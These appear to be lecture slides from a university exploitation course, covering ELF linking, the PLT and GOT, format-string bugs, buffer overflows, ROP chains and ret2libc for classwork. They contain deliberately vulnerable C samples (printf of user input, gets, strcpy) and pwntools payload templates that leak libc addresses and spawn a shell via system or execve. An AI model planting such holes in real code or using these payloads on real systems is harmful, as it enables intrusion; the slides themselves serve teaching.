ENPM809V

Exploitation Review and ROP Chain

What We Work On

  • ELF & Linking
  • Library And System Calls
  • Format String Exploit Review
  • ROP Chain and ret2libc

ELF & Linking

ELF Header

#define EI_NIDENT 16

typedef struct {
        unsigned char e_ident[EI_NIDENT];
        Elf32_Half    e_type;
        Elf32_Half    e_machine;
        Elf32_Word    e_version;
        Elf32_Addr    e_entry;
        Elf32_Off     e_phoff;
        Elf32_Off     e_shoff;
        Elf32_Word    e_flags;
        Elf32_Half    e_ehsize;
        Elf32_Half    e_phentsize;
        Elf32_Half    e_phnum;
        Elf32_Half    e_shentsize;
        Elf32_Half    e_shnum;
        Elf32_Half    e_shtrndx;
} Elf32_Ehdr;
$ readelf -h a.out       ###Output modified slightly  
  Magic:   7f 45 4c 46               \x7fELF
  Class:                             ELF32
  Data:                              little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048430
  Start of program headers:          52 
  Start of section headers:          8588 
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         9
  Size of section headers:           40 (bytes)
  Number of section headers:         35
  Section header string table index: 34

e_ -- elf

ph -- program header

sh -- section header

off -- offset

ent -- entry

e_shentsize ?

e_shnum ?

e_phentsize ?

e_shtrndx ?*

Section Header Entry Size

Section Header Number (of entries)

Program Header Entry Size

Section Header String Table Index

### modified output 
  [Nr] Name              Type      
  [ 0]                   NULL      
  [ 1] .interp           PROGBITS  
  [ 2] .note.ABI-tag     NOTE      
  [ 3] .note.gnu.build-i NOTE      
  [ 4] .gnu.hash         GNU_HASH  
  [ 5] .dynsym           DYNSYM    
  [ 6] .dynstr           STRTAB    
  [ 7] .gnu.version      VERSYM    
  [ 8] .gnu.version_r    VERNEED   
  [ 9] .rela.dyn         RELA      
  [10] .rela.plt         RELA      
  [11] .init             PROGBITS  
  [12] .plt              PROGBITS  
  [13] .plt.got          PROGBITS  
  [14] .text             PROGBITS  
  [15] .fini             PROGBITS  
  [16] .rodata           PROGBITS  
  [17] .eh_frame_hdr     PROGBITS  
  [18] .eh_frame         PROGBITS  
  [19] .init_array       INIT_ARRAY
  [20] .fini_array       FINI_ARRAY
  [21] .data.rel.ro      PROGBITS  
  [22] .dynamic          DYNAMIC   
  [23] .got              PROGBITS  
  [24] .data             PROGBITS  
  [25] .bss              NOBITS    
  [26] .gnu_debuglink    PROGBITS  
  [27] .shstrtab         STRTAB 

Section Header

  • A defined header that gives information regarding the section the binary
    • Usually the section is unstructured

Examples: .text, .got, .data

Run the command readelf -S /bin/bash

Program Header

  • Indicates how segments required for execution are to be loaded into virtual memory.
  • There exists a Sections to Segment mapping that specifies which sections are part of which segments.

 

Binary Layout

 
  • Does it matter where the Program and Section headers are in the binary?
  • Where must the ELF Header always exist?
  • Are all Section or Program headers needed?

How do multiple source files become a single executable?

ELF file formats:

  • Executable file
  • Shared Object file
  • Relocatable file
  • and some others

ELF Header specifies the file format

 + Executable: specifies how to load the program into a process image (remember exec and forking?)

 

 + Relocatable: specifies how to include it's own code and data into an Executable or Shared object. Object files waiting to be included.

 

 + Shared Object: Dynamic library that links with an executable on load by a linker. Think printf, Libc, stdio.h 

How do multiple source files become a single executable?

ELF file formats:

  • Executable file
  • Shared Object file
  • Relocatable file

Linker links objects with shared libraries.

What does the whole pipeline look like then?

1. GCC compiles into ELF Relocatables

 

2. Static linker links Relocatables and attaches necessary information for Shared Object linking into an Executable

 

3. Loader execs the Executable, then the dynamic linker actually links to the Shared Objects for code execution. 

Library and System Calls

What Are They

  • Library Calls: calls to functions that are linked into a binary
  • System Calls: They are a processes way for asking permission to do something with a resource (at the kernel level)
    • Not standard between distributions and architectures

How do Library Calls Work

  1. At compile time, link in the shared object
  2. At run time, the linker sets up the Global Offset Table in Memory
  3. Function is called: use an offset within the GOT to call the PLT
    1. The Procedure Lookup Table (PLT) facilitates what is called lazy binding in programs. Binding is synonymous with the fix-up process described above for variables located in the GOT. When an entry has been "fixed-up" it is said to be "bound" to its real address.
  4. Jump to the shared object from the linked function

Reference: https://bottomupcs.sourceforge.net/csbu/x3882.htm

How do System Calls Work?

  • User makes calls a function that makes a system call
    • e.g. open, write, read, etc.
    • Can call syscall() function directly
  • The Libc function makes a request to the kernel
  • The kernel looks up the system call requested
  • The kernel executes the system call, which then performs the desired action
  • return all data back to the user
  • Read man 2 syscall

How do System Calls Work?

How do System Calls Work?

I saw you said libc... what is that?

The term "libc" is commonly used as a shorthand for the "standard C library", a library of standard functions that can be used by all C programs (and sometimes by programs in other languages).

-wikipedia

What is happening when we use printf in our binaries?

I saw you said libc... what is that?

What is happening when we use printf in our binaries?

Ensure that we have the proper #include to reference printf in our code

- We lookup printf in the PLT. If it is not found in the PLT, we find it in

   the GOT

      - The GOT has the absolute memory address of the code. The PLT

      delays the cost of looking it up until necessary.

      - We do this to save memory.

 

 

 

 

How does text make it to the screen?

I saw you said libc... what is that?

How does text make it to the screen?

     printf, malloc, read, write, etc. are all wrappers for

     system calls.

     System calls are the process' way of asking for

     permission to do something with a resource.

 

Format String Vulnerabilities

What is it?

  • When a software developer improperly filters content via format strings.
    • Perfect example is printf(user_input);
  • What can this lead to?
    • Arbitrary Code Execution
    • Leakage of information

Example

#include <stdio.h>
#include <unistd.h>

int main() {
    int secret_num = 0x8badf00d;

    char name[64] = {0};
    read(0, name, 64);
    printf("Hello ");
    printf(name);
    printf("! You'll never get my secret!\n");
    return 0;
}

How is it vulnerable?

#include <stdio.h>
#include <unistd.h>

int main() {
    int secret_num = 0x8badf00d;

    char name[64] = {0};
    read(0, name, 64);
    printf("Hello ");
    printf(name);
    printf("! You'll never get my secret!\n");
    return 0;
}
$ ./fmt_string
Enter Input: %7$llx
Hello 8badf00d3ea43eef
! You'll never get my secret!

Useful Format Strings

  • %c - read character from the stack
  • %d, %i, %x - read an integer (4 bytes) from the stack (%x is in hex)
  • %s - de-reference a pointer and read until null byte is hit
  • %hx - leaks two bytes
  • %hhx - Leaks one byte
  • %lx - leaks 8 bytes
  • %n$x - leaks 4 bytes at the nth parameter
    • Example: %7$x - prints the 7th parameter on the stack

Executing Data

  • For executing data, we need to utilize %n and it's varients
    • %n will dereference a pointer - write to that address the number of bytes written to it so far.
    • Why is this bad?

Executing Shellcode

Executing Shellcode Via Pwntools

p = process('./vulnerable')

# Function called in order to send a payload
def send_payload(payload):
        log.info("payload = %s" % repr(payload))
        p.sendline(payload)
        return p.recv()

# Create a FmtStr object and give to him the function
format_string = FmtStr(execute_fmt=send_payload)
format_string.write(0x0, 0x1337babe) # write 0x1337babe at 0x0
format_string.write(0x1337babe, 0x0) # write 0x0 at 0x1337babe
format_string.execute_writes()

Classwork

  • What can be found from the format string vulnerability?
  • What part of memory can we leak
  • See if you can execute shellcode
  • Spend 10-20 minutes on it

Buffer Overflow and ROP

Classic Buffer Overflow

Classic Buffer Overflow

Classic Buffer Overflow

int some_function()
{
    char buff[128]; 
    gets(buff);
    printf("%s\n", buffer);
    return 0; 
}

Classic Buffer Overflow

int some_function()
{
    char buff[128]; 
    gets(buff);
    printf("%s\n", buffer);
    return 0; 
}

Bypassing Mitigations

  • RET2LIBC
  • Address Leakage

ROP Chain

  • Defined as return oriented programming
  • A way of bypassing non-executable stack protection.
  • Reuses code in shared objects or the program itself
  • Classic example is RET2LIBC

ROP Chain - How it Works

  • Overflow the buffer to jump to various gadgets
    • Gadgets could be some things like pop rdi; ret
  • Return to an address that you control (the next gadget)
  • Chain as many of these gadgets together to create desired effect
    • Example: create a ROP chain that executes /bin/sh via syscall

What this looks like

void rop1()
{
	printf("1\n");
}

void rop2()
{
	printf("2\n");
}

void rop3()
{
	printf("3\n");
}

void vuln(char *str)
{
	char buffer[100];
    strcpy(buffer, str);
}

void main(int argc, char** argv)
{
	vuln(argv[1]);
}
payload = b"\x90"*108 + rop1_addr + rop2_addr + rop3_addr

output:
1
2
3

Important Gadgets

  • Find resources on the stack - (such as finding /bin/sh or /bin/cat)
  • Fixup Gadgets - Menat to unbreak/stack fix up
    • Examples are pop r12; pop rdi; pop rsi; ret
    • add rsp, 0x40; ret
  • Storing values into registers
    • pop rdx; ret

ROP Chain

[*] rop2 Chain dump:
    0x0000:     0x7f34ab6b15 pop rdx; pop r12; ret
    0x0008:              0x0 [arg2] rdx = 0
    0x0010:      b'eaaafaaa' <pad r12>
    0x0018:     0x7f349c1ccd pop rsi; ret
    0x0020:              0x0 [arg1] rsi = 0
    0x0028:         0x4013a3 pop rdi; ret
    0x0030:     0x7f34b51d4e [arg0] rdi = 546345131342
    0x0038:     0x7f34a80a94 execve

How Did we Get that ROP Chain?

  • Need to understand what parameters need to be set
  • How to set them
  • Find the gadgets
  • Construct the ROP chain
[*] rop2 Chain dump:
    0x0000:     0x7f34ab6b15 pop rdx; pop r12; ret
    0x0008:              0x0 [arg2] rdx = 0
    0x0010:      b'eaaafaaa' <pad r12>
    0x0018:     0x7f349c1ccd pop rsi; ret
    0x0020:              0x0 [arg1] rsi = 0
    0x0028:         0x4013a3 pop rdi; ret
    0x0030:     0x7f34b51d4e [arg0] rdi = 546345131342
    0x0038:     0x7f34a80a94 execve

Finding Gadgets

ROPGadget

https://github.com/JonathanSalwan/ROPgadget

Ropper

https://github.com/sashs/Ropper

Open homework or classwork. Find some gadgets for 10 minutes

Pwntools

[*] rop2 Chain dump:
    0x0000:     0x7f34ab6b15 pop rdx; pop r12; ret
    0x0008:              0x0 [arg2] rdx = 0
    0x0010:      b'eaaafaaa' <pad r12>
    0x0018:     0x7f349c1ccd pop rsi; ret
    0x0020:              0x0 [arg1] rsi = 0
    0x0028:         0x4013a3 pop rdi; ret
    0x0030:     0x7f34b51d4e [arg0] rdi = 546345131342
    0x0038:     0x7f34a80a94 execve
#Construct a ROP to leak libc
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])

Common Gadgets

  • ret - at the end of every function
  • leave; ret - at the end of many functions
  • pop REG; ret - restoring variables saved registers
  • mov rax, REG; ret - setting the return value (always in RAX)

 

Although these are common, you don't have to use just use these. Can search for any combination of instructions.

Other Important Concepts

#Construct a ROP to leak libc
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])

Procedure Linking Table

  • What is actually called when you call a binary that's dynamically linked
  • If GOT entry for the function is resolved, jumps immediately there
  • If GOT entry is not resolved, then it first resolves the GOT entry, then jumps to it

Global Offset Table

  • A massive table of addresses containing locations in memory of libc functions
    • This is the actual function call 
  • To summarize PLT redirects code execution to the location at GOT.
  • If the address is empty, it coordinates with ld.so (dynamic linker/loader) to get function address and store it in GOT.

Why is this important?

Needed for ret2libc! (homework)

Ret2libc

ret2libc

  • Controlling the binary to return to code into the system's libc
  • Helps us to bypass NX or DEP

Ret2libc - system("/bin/sh")

  • Get base address of libc
    • If ASLR is enabled, we need to leak this
  • Add padding to ret
  • Find the address of pop rdi; ret
  • Find the address the "/bin/sh" string
  • Find the address of "system"
  • Say where you want to return to

How can we find these gadgets?

You do that right now! Use ropper/ROPGadget to find them.

What does this look like?

# pwntools example

rop = ROP([binary, libc])
binsh = next(libc.search(b"/bin/sh"))
rop.execve(binsh, 0, 0)

rop.dump()

'''output

[*] rop Chain dump:                                                                                           
    0x0000:     0x7f69246a85 pop rdx; pop r12; ret                                                             
    0x0008:              0x0 [arg2] rdx = 0                                                                    
    0x0010:      b'eaaafaaa' <pad r12>                                                                         
    0x0018:     0x7f69153673 pop rsi; ret                                                                      
    0x0020:              0x0 [arg1] rsi = 0                                                                    
    0x0028:         0x4013a3 pop rdi; ret                                                                      
    0x0030:     0x7f692e1c11 [arg0] rdi = 547225476113                                                         
    0x0038:     0x7f692107c4 execve    
    
'''
payload = padding + rop.chain()
### without pwntools gadget finder

# These addresses you need to figure 
# out from within the binary
libc_base = 0x12345678
POP_RDI = pop_rdi_addr 
system = libc_base + offset_system_addr
binsh = libc_base + offset_binsh_addr

payload = padding
payload += p64(POP_RDI)
payload += p64(binsh)
payload += p64(system)
payload += p64(whatever_you_want_to_ret_to)

What if we need libc base address?

int vuln()
{
	char buffer[128]; 
    gets(buffer);
    printf("%s\n", buffer);
}
  • Utilize the PLT and GOT to resolve a function
  • Subtract the offset of that function from libc from the address we acquired.

We need a place to receive input

payload = padding
payload += addr_of_poprdi_ret
payload += addr_of_func_got
payload += addr_of_func_plt
payload += ret_to_beggining_of_vuln

# pwntools automated
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
rop.dump()

'''
[*] Rop1 chain dump:                                                                                                                                                                    
    0x0000:         0x4013a3 pop rdi; ret                                                                                                                                               
    0x0008:         0x404028 [arg0] rdi = got.puts                                                                                                                                      
    0x0010:         0x4010c4 puts                                                                                                                                                       
    0x0018:         0x401316 0x401316() 
'''

What if we need libc base address?

int vuln()
{
	char buffer[128]; 
    gets(buffer);
    printf("%s\n", buffer);
}
  • Utilize the PLT and GOT to resolve a function
  • Subtract the offset of that function from libc from the address we acquired.

We need a place to receive input

payload = padding
payload += addr_of_poprdi_ret
payload += addr_of_func_got
payload += addr_of_func_plt
payload += ret_to_beggining_of_vuln

# pwntools automated
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
rop.dump()

'''
[*] Rop1 chain dump:                                                                                                                                                                    
    0x0000:         0x4013a3 pop rdi; ret                                                                                                                                               
    0x0008:         0x404028 [arg0] rdi = got.puts                                                                                                                                      
    0x0010:         0x4010c4 puts                                                                                                                                                       
    0x0018:         0x401316 0x401316() 
'''
libc = ELF("/path/to/libc.so.6")

io.sendline(payload)
addr = io.recvline()

#parse the address received

addr = addr.strip()
leak = u64(addr.ljust(8, b"\x00"))

libc.address = leak-libc.symbols["puts"]
log.info("libc base address = 0x{}".format(libc.address))

Putting it all together

  • Get the libc base address
    • Leak it somehow
    • Format string or printing it out via another ROP Chain
  • Find the gadgets to execute the functions you want (from libc and the binary)
  • Construct the ROP chain to execute what you'd like
  • Execute!

Work on the homework!